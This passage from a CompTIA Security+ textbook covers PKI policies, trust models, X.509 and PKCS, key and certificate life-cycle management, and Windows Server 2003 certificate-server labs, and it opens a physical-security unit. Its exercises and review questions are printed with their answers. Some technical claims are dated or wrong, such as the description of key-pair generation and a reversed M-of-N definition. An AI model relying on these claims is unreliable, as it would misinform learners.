Certificate policies and certificate practice statements are two primary documents that address the intended use of the certificates and operating procedures of a CA and PKI, respectively. Guidelines for writing these documents are defined in IETF RFC 2527. Certificate policy The certificate policy is a set of rules indicating the applicability of a certificate to a particular community and/or class of application with common security requirements (IETF RFC 2527). In other words, the certificate policy dictates under what circumstances the certificate will be used. For example, the CA can issue one type of certificate for e-commerce, a second for e-mail, and a third for application software. CAs use the certificate policy to protect themselves from claims of loss if the certificate is misused. The policy should identify the user community conforming to these policies, the names of the Certificate and Registration Authorities, and the certificates Object Identifier (OID). Certificate practice statement The certificate practice statement (CPS) is a published document that explains how the CA is structured, which standards and protocols are used, and how the certificates are managed. When dealing with security systems, make sure the CA has a policy covering each item required. If youre using a private/internal PKI system, this information should be made available by the PKI administrator. Also, if a CA does not have a CPS available, users should consider finding another CA.
Trust models
In small organizations, its easy to trace a certification path back to the CA that granted the certificate. But, internal communications are not the only ones requiring validation. Communication with external clients and customers is an everyday occurrence. Its difficult to trust communications from entities who dont appear in an organizations CA. Organizations typically follow a trust model, which explains how users can establish a certificates validity. Three commonly used models are: Single-authority trust (also known as the third-party trust) Hierarchical trust Web of Trust (also known as the Mesh trust)
Cryptography Single-authority trust (or third-party trust)
1413
In the single-authority trust model, a third-party central certifying agency signs a given key and authenticates the owner of the key. The users trust the authority and, by association, trust all keys issued by that authority. Exhibit 14-4 illustrates this model.
Exhibit 14-4: Single-authority trust model

Hierarchical trust In the hierarchical trust (shown in Exhibit 14-5), a top-level CA, known as the root CA, issues certificates to intermediate (or subordinate) CAs. The intermediate CAs can issue certificates to their subordinate CAs and on down the line. The lowest layer of the CA hierarchy are the leaf CAs, which issue certificates to end users, servers, and other entities that use certificates. The process builds a pyramid of CAs, with the trust path leading back to the root CA. All certificate holders trust the root sufficiently to trust any CAs remotely connected to it. To prevent compromise of the root CA, companies will often set up the entire CA hierarchy and then take the root offline, leaving all certificate management to the subordinate CAs. The model allows for enforcement of policies and standards throughout the infrastructure.
Exhibit 14-5: Hierarchical trust
Cryptography Web of Trust (or Mesh trust)
1415
In the Web of Trust model (shown in Exhibit 14-6), the key holders sign each others certificates, thereby validating the certificates based on their own knowledge of the key holder. Anyone can sign someone elses public key, becoming an introducer in the process. If a user knows and trusts the introducer, he or she should be willing to trust the public key through association. This model is used in encryption applications, such as PGP, where no central authority exists. The main vulnerability with the Web of Trust is the careless or malicious user who signs bad keys. If just one person in the Web of Trust is negligent, the whole group can be affected.
Exhibit 14-6: Web of Trust model
1416 CompTIA Security+ Certification Standards and protocols

Digital certification is a relatively new technology and, consequently, a variety of standards have arisen from various sources. Two of the most commonly used standards are X.509 and Public Key Cryptography Standards (PKCS) X.509 The X.509 International Telecommunication Union (ITU) recommendation is the most widely used standard for defining digital certificates. Because its a recommendation and not an official standard, different vendors have adapted it to meet their needs. For example, Netscape and Microsoft both use X.509 certificates when securing transactions over the Internet, but an X.509 certificate generated by Netscape may not be readable in Internet Explorer. All X.509 certificates must contain the following information:
Content X.509 version Description Identifies which version of the X.509 standard applies to this certificate, which in turn determines what information can be specified in it. Public key of the certificate holder, together with an algorithm identifier that specifies which cryptosystem the key belongs to and any associated key parameters. Unique serial number to distinguish it from other certificates issued. This information is used in numerous ways; for example, when a certificate is revoked, its serial number is placed on a certificate revocation list (CRL). Intended to be unique across the Internet, a DN consists of multiple subsections and may look something like this: CN=Jonathan Public, EMAIL=jonathanpublic@hotmail.com, OU=Security Team, O= Consulting Inc, C=US (These refer to the subjects Common Name, Organizational Unit, Organization, and Country.) Certificates validity period Unique name of the certificate issuer Digital signature of the issuer Signature algorithm identifier Start date/time and expiration date/time.
Serial number of the certificate
Certificate holders distinguished name (DN)
Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate. Signature using the private key of the entity that issued the certificate.
Algorithm used by the CA to sign the certificate.
Public Key Cryptography Standards (PKCS) PKCS is an industry standard developed by RSA Laboratories in cooperation with a consortium of system developers, including Apple, DEC, Lotus, Microsoft, MIT, and Sun. The standard was first published in 1991 to help deploy public-key cryptography. The standard defines encryption algorithms (PKCS #1), Diffie-Hellman and elliptic curve algorithms (PKCS #13), password-based encryption (PKCS #5), private-key standards (PKCS #8), and certification request syntax (PKCS #10).
Cryptography Do it!
1417
B-1:
Understanding Public Key Infrastructure

1 What is the responsibility of the Registration Authority?
The RA is used to offload the work of the CA, verifying the subscribers identity, distributing key pairs, and initiating the certification process.
2 The _______________ is a database that stores certificates.

certificate repository
3 Explain the difference between a certificate policy and certificate practice statement.
The certificate policy is issued with each certificate and describes how that particular certificate will be used. The policy identifies the user community, the names of the CA and RA, and the certificates OID. The certificate practice statement is a published document that explains how the CA runs its business. It includes the CA structure, the standards and protocols used, and the way certificates are managed.
4 For each of the descriptions below, identify whether the trust model is single authority, Web of Trust, or hierarchical. A third-party CA signs a key, authenticating the owner of the key. An introducer signs a colleagues certificate. The trust path leads back to a root CA. This model allows for enforcement of policies and standards throughout the infrastructure.
Single authority
Web of Trust Hierarchical Hierarchical
5 Netscape and Microsoft both use X.509 certificates, and any browser can read their certificates. True or false?
False. Both vendors have adapted X.509 to meet their needs, which means that their certificates are not necessarily compatible with other browsers.
6 PKCS was developed by RSA and other system developers to standardize ______________. A B C
D
Encryption algorithms Private-key standards Certification request syntax All of the above
Topic C: Key management and life cycle

# 4.3 Objective Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Revocation 4.5 Understand and be able to explain the following concepts of Key Management and Certificate Lifecycles Centralized vs. Decentralized Storage Hardware vs. Software Private Key Protection Escrow Expiration Revocation Status Checking Suspension Status Checking Recovery M-of-N Control (Of M appropriate individuals, N must be present to authorize recovery) Renewal Destruction Key Usage Multiple Key Pairs (Single, Dual)
Securing public-key management systems

Explanation Attacks on public-key systems typically target key-management systems rather than attempting to crack public-key encryptions. Therefore, these systems must be well protected. If a key-management system is compromised, the hacker can use the stolen keys to forge certificates and impersonate someone else. All trust associations are compromised as well. Key life cycle describes the stages a key goes through during its life: generation, distribution, storage, backup, and destruction. Encryption key management describes the systems used to manage those keys throughout their life cycle. If any phase of a keys life is not managed properly, the entire security system can be compromised.
Cryptography
1419
Centralized and decentralized management

PKI offers two broad models for generating and administering public keys: centralized and decentralized management. Centralized key-management systems place all authority for key administration with a top-level entity. This could be a CA within an organization or a trusted third-party entity. This model gives the administrator system-wide control over each aspect of key management. This model typically appears in scenarios where a hierarchical or singleauthority trust model is implemented, as in the case of X.509 certificates. Decentralized key-management systems place responsibility for key management with the individual. The key and certificate are stored locally on the users system or some other device, and the user controls all key-management functions. Decentralized systems do not provide all the functionality of centralized systems. For example, if a user loses or damages the private key, there is no way to recover the private key or the encrypted information. This model typically appears in scenarios where the Web of Trust model is implemented, as in the case of PGP certificates. The decision to use centralized or decentralized systems depends on the size of the public-key infrastructure. If the number of keys that users retain on their key rings is limited, and the users are educated to properly protect their private keys, decentralized management works well. However, for a large organization, where thousands of keys may be generated, centralized management transfers the burden of private-key security from the end users to a trained individual or team.
Setup and initialization

The three main phases of the key- and certificate-life-cycle management process are: setup or initialization; administration of issued keys and certificates; and certificate cancellation and key history. The setup or initialization process consists of: 1 Registration 2 Key pair generation 3 Certificate generation 4 Certificate dissemination Registration The registration process starts when a user approaches the CA with a specific request for a certificate. After verifying the identity and credentials of the user, the CA registers the user. Depending on the certificate practice statement, certificate policy, and privileges associated with a given certificate, the identity verification process may require a physical appearance at the CA or submission of documented proof of identity.

Key pair generation Key pair generation involves creating matching private and public keys by using the same passphrase and different algorithms. Especially within the context of keys being used for non-repudiation services, the owner of the private key is entrusted with generating and storing such keys. In other scenarios, performance, usage, legalities, and algorithm specifications are the factors affecting the choice of location. Multiple key pairs are often generated to perform different roles to support distinct services. A key pair can also be restricted by policy to certain roles based on usage factors such as type, quantity, category, service, and protocol. For instance, a certificate can be restricted to a particular function, such as signing or encryption. Multiple key pairs allow the CA to issue multiple certificates to the user for distinct functions. Certificate generation The responsibility of creating certificates lies with the CA, regardless of where the key pair is generated. A certificate binds an entitys unique distinguished name (DN) and other identifying attributes to its public key. The entity DN can be an individual, an organization or organizational unit, or a resource (for example, a Web server or site). The certificate policy governs the creation and issuance of certificates. The public key needs to be transmitted securely to the CA if it was generated elsewhere by a party other than the CA. Requests for keys and certificates require secure transmission modes. The IETF defines management and request message format protocols specifically for the purpose of transmitting public keys and certificates between the key owner and the CA. Alternatives such as the Public Key Cryptography Standard also exist. Certificate dissemination Dissemination involves securely making the certificate information available to a requester without too much difficulty. This is done through several techniques, including out-of-band and in-band distribution, publication, centralized repositories with controlled access, and so forth. Each method has its own benefits and drawbacks. Depending on the client-side software, certificate usage, privacy, and operational considerations, the information requirements and dissemination method vary. Several protocols are available that facilitate secure dissemination of certificates and revocation information. Enterprise domains widely use LDAP repositories with appropriate security controls, along with in-band distribution through S/MIME-based e-mail. This hybrid approach maximizes the benefits. Even within the repository model, several configurationssuch as direct access, interdomain replication, guard mechanism, border, and shared repositoriesare possible and often used.
Administration of issued keys and certificates

The issued keys and certificates need to be administered properly after the initialization phase. The administrative phase involves the following: Key storage Certificate retrieval and validation Key backup or escrow Key recovery
Cryptography Key storage
1421
Once the key pair has been generated, the private key must be safely stored to protect it from being compromised, lost, or damaged. There are several key-storage methods, generally categorized as hardware or software storage. Hardware storage refers to storing the private key on a hardware storage medium, such as a smart card, memory stick, USB device, PCMCIA card, or other such device. These devices can be physically carried on the person, enforce encryption of the private key, and often provide the added benefit of on-board encryption and decryption processing. The main disadvantage to this method is that the storage medium is small and can be easily lost or stolen. Software storage refers to storing the private key in a computer file on the hard drive. The owner encrypts the private key by using a password or passphrase, and stores the encrypted key in a restricted file. The user can enable auditing to track access to this file. This method is not considered reliable, because if the file is restored to a different medium (such as a floppy disk or FAT drive), the encryption is removed. Certificate retrieval and validation As the name implies, certificate retrieval involves access to certificates for general signature verification and for encryption purposes. Retrieval is necessary as part of the normal encryption process for key management between the sender and the receiver. For verification, retrieval is used as a reference where the certificate containing the public key of a signed private key is retrieved and sent along with the signature or is made available on demand. Its imperative to have an easy and simple mechanism to retrieve certificates; otherwise, the complexity makes the system unusable. Validation is performed to ensure that a certificate is issued by a trusted CA in accordance with appropriate policy restrictions and to ascertain the certificates integrity and validity (whether its expired or has been revoked) before its actual usage. In most cases, all of this is achieved transparently by the client software before cryptographic operations using the certificate are carried out. Note: Attempts to use revoked certificates are a likely sign of attempted break-in. Key archive Key archiving is the storage of keys and certificates for an extended period of time. Its an essential element of business continuity and disaster recovery planning, and its the only solution that addresses lost keys and recovery of encrypted data. When used with additional services such as time stamping and notarization, a key-archive service meets audit requirements and handles the resolution of disputes. Key archiving is typically undertaken by an organizations CA, a trusted third party, or, in some cases, the end entity (although this is generally not reliable due to the complexities involved). All private keys (current, expired, and revoked), with the exception of keys used for non-repudiation, are backed up to a key-archival server. The server requires strong physical security and at least the same security as the keygenerating system.

Key escrow Key escrow is a form of key archive that allows third-party access without the cooperation of the subject (such as for law enforcement or other government agencies). Copies of the private keys are stored in an off-site repository called a key escrow agency. In 1995, the U.S. government required that all parties keep copies of the key pairs with a key escrow agency. Almost immediately, the government was questioned about its intentions for requiring key escrows. Eventually, the government dropped the requirement. Key escrow has severe implications on individual privacy because control of the private keys is passed to a third party. Key recovery Key recovery complements the key backup/escrow process. The recovery of lost, damaged, or archived keys allows access to encrypted messages and prevents permanent loss of business-critical information. This process is also automated to minimize user intervention and errors. Many archive systems use the M of N Control to ensure that no single administrator can abuse the recovery process. This access-control mechanism creates a PIN number during the archive process and splits the number into two or more parts (N is the number of parts). Each part is given to a separate key-recovery agent (a person authorized to retrieve a users private key). The recovery system can reconstruct the PIN number only if M number of agents provide their individual PIN numbers. For M of N Control to work, N must be greater than 1, and M must be less than or equal to N (N > 1 and M N).
Certificate cancellation and key history

The final phase in the life cycle management deals with cancellation procedures. This phase includes: Certificate expiration Certificate renewal Certificate revocation Certificate suspension Key destruction Certificate expiration Certificate expiration occurs when the validity period of a certificate expires. Every certificate has a fixed lifetime, and expiration is a normal occurrence. Upon expiration, a certificate can be renewed if the keys are still valid and remain uncompromised, or are destroyed. Note: Most applications will reject a certificate if its in an expired state.
Cryptography Certificate renewal
1423
Certificate renewal is the process of issuing a new certificate with a new validity period. All thats required is that the certificate owner use the old key to sign a request for a new certificate. To facilitate smooth transition and prevent service interruption, the renewal should be initiated when a certificate approaches three-quarters of its intended lifetime (or 30 days before expiration). Many Certificate Authorities merely repackage the old public key with the new certificate. This is a bad practice because the longer you keep the same key pair, the more insecure it will become over time. Ideally, a new key should be generated with each renewal (also called a certificate update). Certificate revocation Certificate revocation implies the cancellation of a certificate before its natural expiration. Certificate owners and PKI administrators (with the approval of the certificate owner) can revoke a key for any number of reasons; for instance, a company changes ISP or moves to a new address, a contact leaves the company, or a private key is compromised or damaged. The cancellation process is much easier than properly publishing and maintaining the revocation information after the fact. There are several ways in which the notification is accomplished. The primary method is through certificate revocation lists (CRLs). Essentially, CRLs are data structures containing revoked certificates. To maintain integrity and authenticity, CRLs are signed. Other methods include CRL distribution points, certificate revocation trees (CRTs), and Redirect/Referral CRLs. Performance, timeliness, and scalability are some of the main factors that influence the revocation mechanisms. Instant-access methods through Online Certificate Status Protocols (OCSP) are also available. However, there is no guarantee that the real-time service is indeed providing an up-to-the-moment status. Its possible that the service might respond based on poorly updated databases. Additionally, many application implementations do not constantly check CRLs. There are also exceptions for which such notification is deemed unnecessary. Two such exceptions involve short certificate lifetimes and single-entity approvals. In the former case, the accepted revocation delay might be more than the certificate lifetime, so the certificate might not require revocation at all. In the latter case, as requests are always approved by a single entity, it might not be necessary to publish the revocation separately. The delay associated with the revocation requirement and subsequent notification is called revocation delay. Revocation delay must be clearly defined in the certificate policy because it determines how frequently or quickly the information is broadcast and used for verification. Certificate suspension If a certificate is not used for a period of time, the CA will eventually revoke it. To prevent this from taking place, a certificate owner will suspend the certificate, temporarily revoking it. Often this option is executed if an employee is on an extended leave of absence or a Web site is taken offline for renovations. The suspension is published in the CRL or OCSP with a status of Certification Hold. At the appropriate time, the suspension can be undone.

Key destruction CAs typically destroy certificates and any keys associated with them when certificates expire or get revoked. Another significant event warranting key destruction occurs before a certificate server or key archival server is sold or recycled. Key destruction is usually accomplished by overwriting the key data. One common method is zeroization, which overwrites the data with zeros.
Administrative responsibilities
Setting up an enterprise PKI is an extremely complex task with enormous demands on financial, human, hardware, and software resources, in addition to the time factor. Its very important to understand the concepts, processes, and products involved, and to ask pertinent questions right at the beginning. In addition to basic support, training, and documentation issues, some of the areas that need to be explored in detail include, but are not limited to, the following: Support for standards, protocols, and third-party applications Issues related to cross-certification, interoperability, and trust models Multiple key pairs and key-pair uses Methods to PKI-enable applications and client-side software availability Impact on end user for key backup, key or certificate update, and nonrepudiation services Performance, scalability, and flexibility issues regarding distribution, retrieval, and revocation systems Physical access control to facilities The security awareness in the IT industry has grown considerably, and the business community is beginning to understand the seriousness of security implications and the benefits of PKI. With the growth in e-commerce, PKI deployments are expected to continue to grow significantly over the next couple of years, despite questions on standards, policies, products, legalities, return on investment, and the technology itself.
Cryptography Do it!
1425
C-1:
Understanding certificate life cycle and management
Exercises
1 What is the key life cycle?
The key life cycle describes the stages a key goes through during its life: generation, distribution, storage, backup, and destruction.
2 What is a centralized key-management system?

This is a key-management model that places all authority for key administration with a toplevel entity, such as the CA. The administrator has system-wide control over each aspect of key management.
3 Match each phase of key management below with its definition: Certificate generation Certificate revocation Key archival Key pair generation Key storage Certificate renewal Certificate validation Key escrow Key recovery Registration
Certificate validation Certificate revocation Certificate renewal Key recovery
A browser requests signature verification of a certificate. A certificate is cancelled before its expiration date. A certificate is reissued with a new validity period. A key is retrieved from archive due to loss or damage of the original. Matching private and public keys are created. A private key is safely stored on a hardware or software medium. The CA binds the requestors identifying attributes to its public key. The key is stored for an extended period of time. The key is stored in an off-site repository for third-party access. The user approaches the CA with a specific request for a certificate.
Key pair generation Key storage
Certificate generation
Key archival Key escrow
Registration
4 What is the difference between certificate revocation and suspension?

Certificate revocation permanently cancels a certificate. Suspension involves a temporary revocation; upon request, the certificate is reactivated.
Topic D: Setting up a certificate server

# 4.5 Objective Understand and be able to explain the following concepts of Key Management and Certificate Lifecycles Revocation
Certificate services servers

Explanation Servers running certificate services can perform as one of two types of Certificate Authorities: Enterprise or Stand-alone. The Enterprise CA is part of Active Directory, and it can use templates and smart cards, and publish certificates in Active Directory. The Stand-alone CA does not require Active Directory and has no way to use templates. All certificates are marked pending until issued by an administrator. Certificates created on a Stand-alone CA are not published and therefore have to be distributed manually.
Exhibit 14-7: Selecting a certification authority type
Cryptography Do it!
1427
D-1:
Installing a certificate server Heres why

(If necessary.) In this lab, you will install Certificate Services and create a Stand-alone Root CA that is not a member of a Windows Server 2003 domain.
Heres how
1 Log on to your server as Administrator
2 Click Start 3 Choose Control Panel, Add

or Remove Programs
4 Click Add/Remove
Windows Components
The Windows Components Wizard starts.
5 Check Certificate Services Click Yes 6 Click Next 7 Select Stand-alone root CA Click Next 8 Enter Course Root CA 9 Click Next 10 Change the Shared folder to
C:\CertConfig As the Common Name for the CA. If necessary. To accept the warning message.
Click Next 11 Click Yes 12 Click Yes

To create the share. To stop Internet Information Services temporarily.

13 Insert the Windows Server 2003 CD
Assist students should they encounter a setup failed error during installation.
If prompted.
Click OK
If you receive an error message that setup failed with an error, perform the following steps: Click OK and click Finish. Restart the Add/Remove Windows Components wizard and remove Certificate Services. Then, click Start and choose Administrative Tools, Internet Information Services (IIS) Manager. Select Web Service Extensions, select All Unknown ISAPI Extensions, click Allow and click Yes. Select All Unknown CGI Extensions, click Allow and click Yes. Close Internet Information Services (IIS) Manager and start this activity over beginning with step 4. To enable Active Server Pages.
14 Click Yes 15 Click Finish 16 Close all windows 17 Restart the computer
Cryptography
1429
Client certificate
Explanation Windows Server 2003, when running certificate services and IIS, allows Web-based certificate requests. You can specify the type of certificate that you want and then wait for approval from an administrator. If you were using an Enterprise CA, the approval process would be automatic. Because youre using a Stand-alone CA, however, the certificate is pending until approved, as shown in Exhibit 14-8. All of these steps can be performed by using a Web browser and the Certification Authority MMC snap-in.
Exhibit 14-8: A pending certificate request Do it!
D-2:
Installing a client certificate Heres why
Heres how
1 Click Start, then right-click My
Computer
Choose Manage 2 Expand Local Users and

Groups
Right-click Users Choose New User 3 Enter CertUserX Enter Password1 Uncheck User must change
password at next logon In the User name field. As the password.
Click Create 4 Click Close

5 Make CertUserX a member of the Power Users group Close all windows and log off Administrator 6 Log on as CertUserX 7 Launch Internet Explorer 8 Check the In the future, do not show this message box and click OK 9 In the address box, enter
http://server-x/certsrv Replace server-x with the name of your server.
Press e Click Add twice, then click

Close To add the site as a trusted site. You will then see a screen resembling the one shown below.
10 Click Request a certificate 11 Click advanced certificate

request
12 Click Create and submit a

request to this CA
The Advanced Certificate Request form appears.
13 Enter Student## into the name field 14 Check Mark keys as

exportable
Substitute ## with your student number.
Cryptography 15 Click Submit Click Yes Click Yes 16 View the Certificate Pending page 17 Log off CertUserX 18 Log on as Administrator 19 Click Start Choose Administrative
Tools, Certification Authority To acknowledge the warning messages.
1431
If prompted by another warning message. It provides you with information about the pending certificate request.
20 Expand Course Root CA 21 Select Pending Requests 22 Right-click the certificate Choose All Tasks, Issue 23 Select Issued Certificates
To view the issued certificate.
24 Log off Administrator 25 Log on as CertUserX 26 Launch Internet Explorer 27 In the address box, enter
http://server-x/certsrv Replace server-x with the name of your server.
Press e 28 Click View the status of a

pending certificate request
29 Click your certificate 30 Click Install this certificate Click Yes 31 Log off CertUserX
You will receive a message that the certificate was successfully installed.
1432 CompTIA Security+ Certification Certificate server administration

Explanation Once you have the Certificate Authority up and running, be sure to perform preventive maintenance. You can stop and start the service without shutting down the server; this feature can help reduce downtime while youre troubleshooting a problem. You can also back up and restore the CA. This is a critical part of preventive maintenance, especially if you have a hardware failure and lose the CA. The CA can be backed up with Windows Server 2003 Backup or with the integrated backup program thats part of the certificate services. These backups can be completed without stopping the service, but the restore requires a reboot.
Exhibit 14-9: Backing up all available items
Cryptography Do it!
1433
D-3:
Administering a certificate server Heres why

In this activity, you will stop and start the certificate services and perform a backup and restore.
Heres how
1 Log on as Administrator
2 Click Start Choose Administrative Tools, Certification Authority 3 Right-click the Course Root CA Choose All Tasks, Stop
Service To stop the CA service.
4 Once the service has stopped, right-click the Course Root CA Choose All Tasks, Start
Service To restart the CA service.
5 In Windows Explorer, create a folder named C:\CABackup 6 In the Certification Authority window, right-click Course
Root CA
To create a backup folder.
Choose All Tasks, Backup

CA
The Certification Authority Backup Wizard starts.
7 Click Next 8 Check the Private key and CA certificate and

Certificate database and certificate database log In the Items to Back Up window, as shown in Exhibit 14-9.
boxes Enter the path C:\CABackup Click Next 9 Enter password in the Password field Confirm the password Click Next

10 Click Finish
Confirm that the backup was successful by looking at the following files: the Course Root CA.p12 file in the CABackup folder, and certback.dat, edb00001.log, Course Root CA.pat, and Course Root CA.edb in the Database folder.
11 In the Certification Authority window, right-click Course

Root CA
Choose All Tasks, Restore

CA
Click OK 12 Click Next 13 Check all boxes Enter C:\CABackup as the folder from which to restore Click Next 14 Type password Click Next 15 Click Finish Click Yes 16 Restart the server
To stop certificate services.
To restore everything.
To restart certificate services. To finalize the settings.
Cryptography
1435
Personal certificates
Explanation There may be a time when you need to import or export your certificates. For instance, you may want to export a certificate for a backup or for use on another computer, or you may want to import a certificate for a restore or if it were sent to you by another user or computer. The file format used in this activity is Personal Information Exchange (PKCS#12). This file type enables the transfer of certificates and their keys from one computer to another.
Exhibit 14-10: Specifying a file to import

Do it!
D-4:
Managing personal certificates Heres why

In this lab, you will export and import a certificate.
Heres how
1 Log on to your server as
CertUserX
2 Click Start Choose Run and enter mmc 3 Choose File, Add/Remove
Snap-in To open a blank mmc console.
4 Click Add 5 Select Certificates Click Add 6 Click Close 7 Click OK 8 Expand Certificates
Current User
9 Expand Personal 10 Select Certificates 11 View the certificate by doubleclicking the name
In the right pane. The screen will look similar to the one shown below.
Cryptography 12 Click OK 13 Right-click the certificate Choose All Tasks, Export Click Next 14 Select Yes, export the
private key To begin the Certificate Export Wizard. To close the window.
1437
Youll now learn how to export a certificate.
Click Next 15 Click Next

To accept the default file format and enable strong protection.
16 Enter password in the Password and Confirm password fields Click Next 17 Click Browse Type CertUserX Click Save 18 Click Next 19 Click Finish 20 Click OK 21 Launch Windows Explorer
To acknowledge that the export was successful. To import a certificate. As the file name. Do not change the path for the file.
Navigate to C:\Documents and Settings\CertUserX\My Documents

22 Right-click the CertUserX.pfx file Choose Install PFX 23 Click Next 24 Click Next 25 Enter password in the Password field Click Next 26 Click Next 27 Click Finish 28 Click OK 29 Close all windows and log off CertUserX
You dont need to save the mmc session. To accept the default Certificate Store. To begin the wizard. To accept the default file to import.
Certificate revocation
Explanation Certificates are used to provide a way to verify the identity of individuals on a network. However, certificates are not 100% effective, and they can be compromised at times. Because of this, you need the ability to revoke certificates. Revoking certificates is an easy process that allows you to specify a reason for the revocation, as shown in Exhibit 14-11.
Exhibit 14-11: Specifying a reason for certificate revocation
Cryptography Do it!
1439
D-5:
Managing certificate revocation Heres why

In this activity, you will revoke a certificate and view the certificate revocation list.
Heres how
1 Log on as Administrator 2 Click Start Choose Administrative Tools, Certification
Authority
3 Expand Course Root CA 4 Select Issued Certificates 5 Right-click the CertUserX certificate Choose All Tasks, Revoke
Certificate
6 Select Key Compromise for the reason Click Yes 7 Select Revoked Certificates 8 Right-click Revoked
Certificates
As shown in Exhibit 14-11.
To view the revoked certificate.
Choose All Tasks, Publish Click OK 9 Right-click Revoked

Certificates To publish a new CRL.
Choose Properties 10 Activate the View CRLs tab 11 Close all windows
To verify that the certificate was revoked.

Do it!
D-6:
Setting up the certificate server

1 Once you revoke a certificate using Windows Server 2003 Certificate Services, it cannot be recovered. True or false?
True
2 Which of the following certificate file formats are supported by Windows Server 2003? (Choose all that apply.)
A B
PKCS #12 PKCS #7 DER Encoded Binary X.500 Base64 Encoded X.509
C D
3 The Certificate Authority service must be stopped to perform a backup using the Certificate Authority Backup Wizard. True or false?
False. Backups can be completed without stopping the service.
4 Which of the following items is not available for backup in a Stand-alone CA environment? A
B
Private key and CA certificate Configuration information Issued Certificate Log and pending certificate request queue All of the above
C D
5 By default, certificates are valid for ___________. A B

C
one month one year two years two months
Cryptography
1441
Unit summary: Cryptography

Topic A In this topic, you examined topics important to modern cryptography. You should now understand the basics of algorithms and the differences between symmetric and asymmetric algorithms. You should also have a general understanding of how encryption technologies such as hashing, digital signatures, and digital certificates affect network security. In this topic, you learned how the Public Key Infrastructure (PKI) establishes a framework for key security, storage, and exchange. You learned about the roles of the Certificate Authority and Registration Authority in verifying the subscribers credentials and issuing certificates. You also learned about the importance of certificate policies, certificate practice statements, and trust models in establishing a trusting relationship between CA and subscriber. You also learned about the standards and protocolsnamely, X.509 and Public Key Cryptography Standards (PKCS)used to establish interoperability across platforms and network architectures. In this topic, you learned about the various phases of the key life cycle and how encryption key management is used to secure each phase. You learned that responsibility for key management can be centralized or decentralized, depending on the number of entities requiring certification and the sensitivity of the data. You also learned about the vulnerable points in the system and about implementing maximum security. In this topic, you learned how to install and administer a certificate server, and how to issue, manage, and revoke certificates.
Topic B
Topic C
Topic D
Review questions
1 What is the name for data that cannot be read without any manipulation? A ASCII B Plaintext
C
Ciphertext
D Script 2 Modern cryptography uses ___________ to encrypt and decrypt data. A probabilities B approximations C ratios
D
algorithms

3 Hashing involves taking a variable-length input and converting it to a(n) ___________.
A
fixed-length output string
B variable-length output string C optional output string D plaintext output string 4 Symmetric algorithms use an encryption key that cannot be calculated from the decryption key. True or false?
False. Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key.
5 Stream algorithms are more efficient than block algorithms. True or false?
False. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits.
6 Digital signatures usually use ____________ algorithms.

A
asymmetric
B symmetric C block D stream 7 PKI stands for what? A Private key intrusion B Public key inventory C Private key infrastructure
D
Public key infrastructure
8 When PKI is used, its the role of the CA to issue certificates to users. True or false?
True
9 Of the following, which is a more threatening situation? A A user tries to use an expired certificate. B A user tries to access the system from home.
C
A user tries to use a revoked certificate.
D A user has forgotten his or her password.
Cryptography
1443
10 A Web of Trust model relies primarily on ___________ to perpetuate trust of certificates. A users themselves B CAs
C
introducers
D managers 11 The certificate practice statement is a published policy that explains to all users how the CA is structured. True or false?
True
12 A digital certificate is a credential that allows a recipient to verify whether a public key belongs to its owner. True or false?
True
13 Which of the following is a reason to revoke a certificate? A The key was lost. B The key is known to someone else. C The key has been compromised.
D
All of the above.
14 Which of the following is the most widely used standard for digital certificates? A X.400 B X.500 C X.25
D
X.509
15 You can safely distribute your public key to others. True or false?
True
16 The Data Encryption Standard (DES) uses a _________-bit key. A 48

B
56
C 128 D 168
151
Unit 15 Physical security

A Assess the impact of physical barriers,
surveillance, and social engineering on physical security.

B Discuss the effect of location, building
materials, power supply, and fire suppression technologies in maintaining a secure environment.
152
Topic A: Access control

# 5.1 Objective Understand the application of the following concepts of physical security Access Control Physical Barriers Biometrics Social Engineering
Physical controls
Explanation Physical security is subject to a different set of threats than are previously discussed aspects of security. Physical security schemes protect not only mission-critical data, but also people, equipment, and the building itself. Many organizations employ various forms of physical security, ranging from security guards and identification badges to closed-circuit television cameras and biometric identifiers. If any of these systems fail, a breach of security can happen, and a compromise of mission-critical data can follow. When youre managing a network environment, its critical to secure all equipment, data, power supplies, wiring, and personnel with access to the location. As with all security, the amount and type of physical security in place should vary with the importance of the data being protected. A financial services company with customersensitive information on its servers is more likely to take drastic steps in its physical security plan than is a simple family-owned business. To best address security, you can use various physical deterrents, including locks, surveillance, fencing, and lighting.
Physical barriers
Perhaps the cheapest and most common way to secure physical access to a facility is to use locks. Locks deter casual intruders from trying to gain access, and locks slow down attempts by more serious security threats. An organization cannot rely completely on a lock-and-key mechanism for protection, however. Locks can be opened by anyone with a key, and if there are no other control mechanisms in place, that person can walk out unnoticed with mission-critical equipment. Various forms of locks can be used as part of an effective physical security plan; among them are preset locks, cipher locks, and device locks. Preset locks Preset locks are the typical locks that most of us are familiar with, such as key and knob combinations or rim locks with deadbolts, as shown in Exhibit 15-1. These locks are activated by using a metal key, and they are probably the least secure, because keys are easily lost or stolen and can be used by anyone to open the lock.
Physical security
153
Exhibit 15-1: Preset lock Cipher locks Cipher locks are programmable and use keypads to control access into a facility. Although they are considerably more expensive than preset locks, cipher locks offer more security and more flexibility for implementing a physical security plan. Cipherlock components are shown in Exhibit 15-2 and Exhibit 15-3.
Exhibit 15-2: Cipher lock keypad
Exhibit 15-3: Cipher lock card reader
154
CompTIA Security+ Certification Cipher locks come in many forms. Some take the form of keypad inputs that allow an authorized user to enter a password or personal identification number (PIN) to gain access. These systems are much more effective than standard lock-and-key security, yet an unauthorized user might be able to gain access by using an authorized users password or PIN. A potential attacker could very easily watch an employee or contractor enter their personal information into the keypad from afar, and use the codes to gain entry at a later date. A second form of cipher lock reads identification cards for access control. These identification cards usually have a photo of the employee or authorized user with his or her name and employee number. On the back of the card is a magnetic strip that contains the access information of that user. The card reader at the entrance can read this information and verify whether that person has access. If the card is a smart card, the system can ask for a password or PIN, which further enhances the security of the system. A slightly different card can be used with wireless proximity readers. Wireless proximity readers can sense the card when its within a certain distance of the reader. There are two types of proximity readers: user-activated and system-sensing. Useractivated proximity readers operate when the identification card transmits a sequence of values to the reader. System-sensing proximity readers can recognize the card within a specific area, and the readers do not require the user to perform any action to gain access. Cipher locks offer various options that make them a better choice than preset locks. These options include: Door delayIf a door is held or propped open for too long, it can trigger an alarm that causes security personnel to investigate. Key overrideA combination can be set into the lock for use in emergencies or for supervisory needs. Master key ringThis function allows supervisors to change access codes and other features as needed. Hostage alarmIf an employee is being forced to open a secured door 